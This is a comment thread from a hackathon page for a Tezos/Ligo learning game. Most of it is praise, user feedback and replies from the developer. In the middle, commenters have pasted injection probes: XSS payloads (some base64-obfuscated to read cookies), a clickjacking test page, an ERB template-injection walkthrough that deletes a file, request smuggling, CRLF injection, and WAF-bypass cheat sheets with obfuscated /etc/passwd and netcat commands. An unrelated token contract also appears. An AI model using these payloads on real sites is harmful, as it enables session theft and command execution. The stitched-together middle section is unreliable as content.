Learning Tezos and Ligo is fun. Just test it with tezos-monsters.com
This project was developed from scracth especially for Tezos Build hackathon and consist of: - Horror Game Engine (was developed for this hack from scratch) - Game Editor (was developed for this hack from scratch also) - Programming task checkerer (based in Ligo WebIDE)
niceee ///
Wonde<script>alert(2)</script>rful!
Wonderful!
Nice ☺️
awesome
nice
very well
Waiting this! Looks good!
very good
блестяще!!!
omg that is cooll
hellooo
look nice
nice
good
gm
Как поучавствовать в этом?Можно ли заработать карму за участие?
Fjkdfghbb
I think this is a great game and a very invaluable resource for developers, I'm sure everyone will figure it out. Good luck to everyone.
Wow! Nice!
good project
Awesome stuff
Wait for Tezos monters.
cool!!!
I like it! Keep it up
A wonderful project
Good
I like this project. I hope it would be good for everyone!
It‘s very interesting.
hope this project will be a success!
Good
Seem to be a nice way to teach people how to create contracts on the blockchain. That's what want to learn so, yes. The project makes sence for me.
good
I like it <3
hey
interesting, waiting...
good
Interesting... should wait for release
is this still ongoing ?
just gone through this, Imo it's brilliant stuffs, if it will go lives someday later as well
would be a good game I hope to play it
Good
VERY GOOD!!
Not bad
very good
Very good!
Great
Seems awesome mate!
Good
awesome!
Мне понравилось. like it
cool
cool
Класс
Great. Amazing
ı like it
Wow, I think it’s really nice idea
Looks nice
MONSTERRRRRSSSS=))
Good
Intéressant
Very interesting
Hi. Your link ask registration via google, after that it is not working. Is game ready, can I test it?
When will be possible to play?
super
Fine
When begin, look promise.
Great. Amazing
Good
Great
I think this is good idea. I am waiting!
面白かったです
Great ideia!!
nice
like
it was really interesting
Ok
Great
Nice project. But it doesn't work anymore.
i like it a lot, horror
wow good
nice
Cool
güzel
nice
Does it even work?
Looks very terrible 😂
Cool
amazing!
very useful!
intelligently
I believe in this project
楽しそう
nice project !
Look interesting
Really Great
Great project
Awesome
че за фигня!?
nice!
Looks great, tezos perfect platform. Let me know if you need someone to bounce ideas off
nice
great project!!!
Cool project!
nice proect.
Like it !!!
Cool project!
Oh, that ’s good~^^
great!
Good project
what the scripts comments?
Good
Good!
nice proect.
great project! :)
nice job
bien
Good!!
good
omg that is cooll
nice
cool
No content at all
Very cool
IT IS SO COOL!
<html> <head> <title>Clickjacking Test Sayfası</title> </head> <body> <p>Web sayfanız Clickjacking saldırılarına açık!</p> <iframe src="https://coinlist.co/" width="500" height="500"></iframe> </body> </html>
Notice that when you try to view more details about the first product, a GET request uses the message parameter to render "Unfortunately this product is out of stock" on the home page. In the ERB documentation, discover that the syntax <%= someExpression %> is used to evaluate an expression and render the result on the page. Use ERB template syntax to create a test payload containing a mathematical operation, for example: <%= 7*7 %> URL-encode this payload and insert it as the value of the message parameter in the URL as follows, remembering to replace your-lab-id with your own lab ID: https://your-lab-id.web-security-academy.net/?message=<%25%3d+7*7+%25> Load the URL in your browser. Notice that in place of the message, the result of your mathematical operation is rendered on the page, in this case, the number 49. This indicates that we may have a server-side template injection vulnerability. From the Ruby documentation, discover the system() method, which can be used to execute arbitrary operating system commands. Construct a payload to delete Carlos's file as follows: <%= system("rm /home/carlos/morale.txt") %> URL-encode your payload and insert it as the value of the message parameter, remembering to replace your-lab-id with your own lab ID: https://your-lab-id.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
1|whoami
POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 6 Transfer-Encoding: chunked 0 G İkinci yanıt şunu söylemelidir: Unrecognized method GPOST.
<form method="$method" action="$url"> <input type="hidden" name="$param1name" value="$param1value"> </form> <script> document.forms[0].submit(); </script>
Alıntılanan öznitelikten kaçmak ve bir olay işleyicisi enjekte etmek için girişinizi aşağıdaki yük ile değiştirin: "onmouseover="alert(1)
<a href="jav%0Dascript:alert(1)"> RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd$u RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd+\# RCE Payloads for PL1 and PL2 by @theMiddle (v3.0) /???/??t+/???/??ss?? RCE Payloads for PL3 by @theMiddle (v3.0) /?in/cat+/et?/passw?
<body style="height:1000px" onwheel="alert(1)"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)> HTML Injection by @Global-Evolution GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) XSS Bypass by @0xInfection <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort Cerber (WordPress) Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son POST host.com HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ Standard: <script>alert()</script> Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E 8. Wildcard Obfuscation Globbing patterns are used by various command-line utilities to work with multiple files. We can tweak them to execute system commands. Specific to remote code execution vulnerabilities on linux systems. Standard: /bin/cat /etc/passwd Obfuscated: /???/??t /???/??ss?? Used chars: / ? t s Standard: /bin/nc 127.0.0.1 1337 Obfuscated: /???/n? 2130706433 1337 Used chars: / ? n [0-9]
Standard: <marquee onstart=prompt()> Obfuscated: <marquee onstart=\u0070r\u06f\u006dpt()> Blocked: /?redir=http://google.com Bypassed: /?redir=http://google。com (Unicode alternative) Blocked: <marquee loop=1 onfinish=alert()>x Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode alternative) TIP: Have a look at this and this reports on HackerOne. :) Standard: ../../etc/passwd Obfuscated: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd 4. HTML Representation
Blocked: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12) Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29 3. Unicode Normalization
pragma solidity ^0.8.2; contract Token { mapping(address => uint) public balances; mapping(address => mapping(address => uint)) public allowance; uint public totalSupply = 1000000 * 10 ** 18; string public name = "BabyDogeCoin"; string public symbol = "BabyDoge"; uint public decimals = 18; event Transfer(address indexed from, address indexed to, uint value); event Approval(address indexed owner, address indexed spender, uint value); constructor() { balances[msg.sender] = totalSupply; } function balanceOf(address owner) public returns(uint) { return balances[owner]; } function transfer(address to, uint value) public returns(bool) { require(balanceOf(msg.sender) >= value, 'balance too low'); balances[to] += value; balances[msg.sender] -= value; emit Transfer(msg.sender, to, value); return true; } function transferFrom(address from, address to, uint value) public returns(bool) { require(balanceOf(from) >= value, 'balance too low'); require(allowance[from][msg.sender] >= value, 'allowance too low'); balances[to] += value; balances[from] -= value; emit Transfer(from, to, value); return true; } function approve(address spender, uint value) public returns (bool) { allowance[msg.sender][spender] = value; emit Approval(msg.sender, spender, value); return true; } }
<foo>&xxe;</foo> <!--#directive param="value" --> {{_openBlock.constructor('alert(1)')()}} powershell C:\*\*2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
%E5%98%8A = %0A = \u560a • %E5%98%8D = %0D = \u560d • %E5%98%BE = %3E = \u563e (>) • %E5%98%BC = %3C = \u563c (<) • Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
<a href="/uploads/dosya-adi.pdf"> Dosya İndir</a> İndirilecek
<a href="https://www.google.com/" rel="nofollow"> Link</a> <a href="https://www.google.com/" rel="dofollow"> Link</a>
https://coinlist.co/build/tezos/projects/af37fc9e-31b6-4caf-8ed0-2b5c1e502ccb
#user
@admin
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
"><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS
<svg onload=alert%26%230000000040"1")>
<svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))>
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
msg=<script>alert(1)</script> ?msg=<img src=xss onerror=alert(1)> ?msg=<input/onmouseover=”javaSCRIPT:confirm(1)” ?msg=<iframe %00 src=” javascript:prompt(1) ”%00>
<h1>Hello World</h1>
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Yazılım Bilişim</title> <meta http-equiv="refresh" content="3;URL=https://www.yazilimbilisim.net"> </head> <body> <h1>3 Saniye Sonra YazılımBilişim Sayfasına Yönlendirileceksiniz</h1> </body> </html>
<meta http-equiv="refresh" content="3;">
%u003Csvg onload=alert(1)> %u3008svg onload=alert(2)> %uFF1Csvg onload=alert(3)
'-alert(document.domain)-'
<img src =1 href=1 onerror="javascript":alert(1)"></image>
"></select><img%20src=1%20onerror=alert(1)>;
Mukemmel '/%#^*¥¥(₺¥=@++×€¥0987
Amazing
amazing!
Nice idea, play to learn is a really good approach
great!!
amazing
nice project
Amazing wow new things coming on tezos
Learning makes me happy
amazing
Incluso yo no soy un programador, he aprendido solidez con CryptoZombies y he ganado algunos hackatones con ese conocimiento. Por lo tanto, un enfoque de este tipo que sugiere con la aplicación es dramáticamente efectivo para involucrar a nuevos desarrolladores y emprendedores en el ecosistema. ¡Buen trabajo!
bom
perfect
I'm from Vietnam, my daily job is a programmer
Just published an article about Tezos Monsters: https://medium.com/@mikael.lazarev/how-to-become-a-monsters-in-tezos-development-400cf14233bf?sk=cccff54d1242d78bca7c92904f9d7682
@Alex and @Gleb, thanks for your feedbacks, I hope you enjoyed! Especially for you and a lot of others persons who asked me for "show me answer" feature, today I've delivered it. Now you could get "Correct answer" at each code page. Enjoy! P.S. Hint! You could whole story by pressing "Show me correct answer" - there are a lot of good content there!
Great job!
It's funny and cute game. I played three hours and i want to say that it's one of the best training about smart contracts with gamification.
Yesterday I've published an update based on community feedback: - New fonts for better "eyes experience" - Texts are scroll back to top on new page - Improve game layout - Better performance Thanks for your feedback, together we could build really amazing product
@Savva Antonyuk - Thanks, my idea was to involve as many developers as could to LIGO. Tezos has very interesting concepts however they are new for majority of developers and I want to make a game which could help to learn them
@Ksenia Avetisova Thanks so much, it's great to get a details feedback. I'm really happy that users suggest me which things should be improved!
@Daria Arefieva & @Peter Rybin - Thanks so much for your feedback!
@Anastasiia Kondaurova Thanks so much for your detailed review, I'll make all changes you and other colleagues told me to improve. It's a great pleasure to get real feedback from blockchain developers community
Even I am not a programer I've learned solidity with CryptoZombies and won few hackathons with that knowledge. Therefore such an approach which you suggest with the app is dramatically effective to envolve new developers and enterpreneurs to the ecosystem. Good job!
@Eugene Koinov I appreciate you for your feedback, you are one of the best blockchain developer I know. Thanks from me and our community
👍🏻
Misha, privet! Great game, I played yesterday for 4 hours, you made really good project. Cant pass a page "To hash or not to hash", how to solve that? Code review could be improved. By the way, it's really cool game to learn Ligo.
Hi, Mike! Amazing product, really cool. Some improvements as you asked: - Make clear button on the first screen. It's not so clear how to start - Your button called "check answer", in description: "check code" & "check answer button" - On "Storage Money" page check the code block, it see,s there should be 2 lines But the game is really cool, good job
It's really fun! Thanks, Mikael!
First of all, I want to say a huge Thank you for such a game. I think the Ligo developers don't exist because of a lack of convenient tools for learning. Despite my comment proposes a lot of improvements, the game is incredibly important for Tezos ecosystem. Advantages: - Cool but a bit confusing scenario. - It is harder and thus more interesting than Cryptoverse wars for Smartpy. - A lot of levels that covers most of stages smart contract developer faces. Would be fine to improve: - Poor navigation. It would be better to see topics that will be learned and be able to go back or forward at any time. - Fonts and design. In general it looks harmoniously, but some fonts make eyes to feel tied. - The lack of button "Show answer" or "Show hint". - Code Review isn't explained. For newbies, these magic Michelson instructions could be unclear. It would be better to remove them or add some comments. - Pressing button "Next Page" doesn't return you to the top of the page so you see the end of the new text. It is annoying. - Set is better than map in this case with `friends: map(address, bool)` - Little theory basics. - It seems, I break something. It wasn't working for a long time until page reload. - What is the point of gold? - Please, replace the icon) - Something happened to fonts in a few places. - Just curious, how do you check solutions? - Written code disappear after page reloads. - `To hash or not to hash?` is an unclear chapter. What hash function the user is supposed to use? Whose address should be in map? What is the point of it? In general, tasks, in the end, are hard to understand. I add some screenshots here: https://www.notion.so/Ligo-Horror-0709620778d74f8398222fe875e6f967 Anyway, good job!
Wow, looking really nice and funny!